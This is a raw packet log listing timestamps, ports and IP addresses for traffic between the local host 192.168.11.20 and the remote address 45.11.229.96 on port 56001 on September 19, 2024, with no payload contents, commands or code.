Sep 19, 2024 02:38:48.100596905 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.100615978 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.100672007 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.100711107 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.100743055 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.100779057 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.100804090 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.100830078 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.100872040 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.100931883 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.100969076 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.101042986 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.101062059 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.101113081 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.101147890 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.101242065 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.101248026 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.101311922 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.101377964 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.101408958 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.101408958 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.101444960 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.101486921 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.101500988 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.101572037 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.101630926 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.101686954 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.101708889 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.101708889 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.101778984 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.101862907 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.101880074 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.101959944 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102026939 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102050066 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.102116108 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102202892 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102277040 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102334023 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102368116 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.102401972 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102437019 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.102480888 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102540970 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102634907 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102695942 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102766037 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102823019 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.102826118 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102885962 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102955103 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.102998018 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.102998018 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.103013039 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103076935 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103146076 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103172064 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.103172064 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.103202105 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103283882 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103327036 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.103327036 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.103355885 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103425026 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103457928 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.103488922 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103499889 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.103544950 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103604078 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.103615046 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103641987 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.103676081 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103732109 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103763103 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.103801012 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103857994 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103863001 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.103900909 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.103918076 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.103987932 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.104022980 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.104043961 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.104060888 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.104116917 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.104146957 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.104196072 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.104239941 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.104305983 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.104351997 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.104410887 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.104468107 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.104521036 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.104628086 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.104727983 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.104734898 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.104778051 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.104778051 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.104835033 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.104909897 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.104942083 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.105000973 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.105056047 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.105156898 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.105165005 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.105209112 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.105277061 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.105313063 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.105417013 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.105484009 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.105526924 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.105580091 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.105632067 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.105703115 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.105735064 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.105827093 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.105833054 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.105917931 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.105931997 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.106010914 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.106034994 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.106144905 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.106152058 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.106192112 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.106307030 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.278819084 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.279036045 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.302728891 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.302824020 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.302886963 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.302956104 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.302961111 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303020954 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303081989 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303126097 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.303168058 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303193092 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.303235054 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303299904 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303298950 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.303298950 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.303355932 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303426981 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303489923 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303520918 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.303522110 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.303545952 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303617001 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303673983 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303709030 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.303734064 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303786993 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.303807974 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303873062 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.303945065 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.303946018 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304009914 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304075003 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304167986 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.304192066 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304306984 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304357052 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.304367065 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304431915 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304496050 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304550886 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304621935 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304655075 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.304655075 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.304682016 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304738998 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304809093 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304867029 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304889917 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.304929018 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.304959059 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.304997921 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305054903 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305104017 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.305128098 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305172920 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.305191040 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305247068 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305320024 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305377960 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305407047 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.305440903 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305506945 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305541992 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.305563927 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305593967 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.305633068 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305699110 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305758953 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305774927 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.305828094 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305860043 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.305891037 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.305953026 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.305958986 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.306026936 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.306054115 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.306087971 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.306160927 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.306185007 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.306224108 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.306289911 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.306356907 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.306440115 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.306554079 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.455233097 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.481870890 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.481940031 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.481981993 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.482076883 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.482238054 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.482309103 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.482537031 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.482752085 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.483016968 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.483112097 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.483155012 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.483325005 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.483346939 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.483378887 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.483433008 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.483470917 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.483509064 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.483511925 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.483560085 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.483606100 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.483632088 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.483645916 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.483678102 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.483685970 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.483797073 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.483798027 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.483917952 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.483943939 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.483962059 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.484040022 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.484046936 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.484086990 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.484165907 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.484200954 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.484303951 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.484344959 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.484345913 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.484384060 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.484431028 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.484468937 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.484505892 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.484528065 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.484544039 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.484646082 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.484689951 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.484782934 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.484822035 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.484858036 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.484945059 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.484961987 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.485006094 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.485083103 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.485096931 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.485141993 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.485177040 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.485182047 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.485321045 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.485467911 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.485512018 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.485568047 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.485598087 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.485624075 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.485666037 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.485868931 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.485868931 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.486329079 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.486378908 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.486453056 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.486587048 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.486596107 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.486624956 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.486663103 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.486705065 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.486746073 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.486783028 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.486819029 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.486843109 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.486855984 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.486886978 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.486901999 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.486938953 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.486975908 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.486985922 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.487013102 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.487060070 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.487102985 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.487144947 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.487381935 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.660573959 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.660671949 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.660748959 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.660821915 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.660881042 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.660912991 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.660938025 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661009073 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661034107 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.661066055 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661083937 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.661128998 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661206961 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661240101 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.661264896 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661335945 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661370039 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.661393881 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661452055 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661500931 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.661519051 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661576033 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661637068 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661705017 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661734104 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.661762953 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661834002 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.661892891 CEST	56001	49782	45.11.229.96	192.168.11.20
